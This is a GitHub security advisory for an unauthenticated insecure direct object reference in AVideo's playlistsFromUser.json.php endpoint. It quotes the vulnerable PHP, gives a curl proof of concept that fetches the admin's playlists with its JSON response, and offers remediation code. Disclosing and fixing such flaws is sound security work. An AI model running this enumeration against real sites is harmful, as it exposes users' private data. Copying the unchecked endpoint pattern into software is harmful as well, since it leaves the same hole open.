+ "details": "**Product:** AVideo (https://github.com/WWBN/AVideo)\n**Version:** Latest (tested March 2026)\n**Type:** Insecure Direct Object Reference (IDOR)\n**Auth Required:** No\n**User Interaction:** None\n\n## Summary\n\nThe `/objects/playlistsFromUser.json.php` endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform.\n\n## Root Cause\n\nThe endpoint accepts a `users_id` parameter and directly queries the database without any authentication or authorization check.\n**File:** `objects/playlistsFromUser.json.php`\n\n```php\nif (empty($_GET['users_id'])) {\n die(\"You need a user\");\n}\n// NO AUTHENTICATION CHECK\n// NO AUTHORIZATION CHECK (does this user_id belong to the requester?)\n$row = PlayList::getAllFromUser($_GET['users_id'], false);\necho json_encode($row);\n```\n\nThere is no call to `User::isLogged()` or any comparison between the requesting user and the target `users_id`.\n\n## Affected Code\n\n| File | Line | Issue |\n|------|------|-------|\n| `objects/playlistsFromUser.json.php` | 10-21 | No authentication or authorization check before returning playlist data |\n\n## Proof of Concept\n\n### Retrieve admin's playlists (user ID 1)\n\n```bash\ncurl \"https://TARGET/objects/playlistsFromUser.json.php?users_id=1\"\n```\n\n**Response:**\n```json\n[\n {\"id\":false,\"name\":\"Watch Later\",\"status\":\"watch_later\",\"users_id\":1},\n {\"id\":false,\"name\":\"Favorite\",\"status\":\"favorite\",\"users_id\":1}\n]\n```\n\n<img width=\"1805\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a13c9c2f-29be-4399-98d2-7570ca30465a\" />\n\n\n## Impact\n\n- **Privacy violation** — any visitor can see all users' playlist names and contents\n- **User enumeration** — valid user IDs can be discovered by iterating through IDs\n- **Information gathering** — playlist names and video IDs reveal user interests and private content preferences\n- **Targeted attacks** — gathered information can be used for social engineering or further exploitation\n\n## Remediation\n\nAdd authentication and authorization checks:\n\n```php\n// Option 1: Require authentication + only own playlists\nif (!User::isLogged()) {\n die(json_encode(['error' => 'Authentication required']));\n}\nif ($_GET['users_id'] != User::getId() && !User::isAdmin()) {\n die(json_encode(['error' => 'Access denied']));\n}\n\n// Option 2: If public playlists are intended, filter by visibility\n$row = PlayList::getAllFromUser($_GET['users_id'], false, 'public');\n```",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments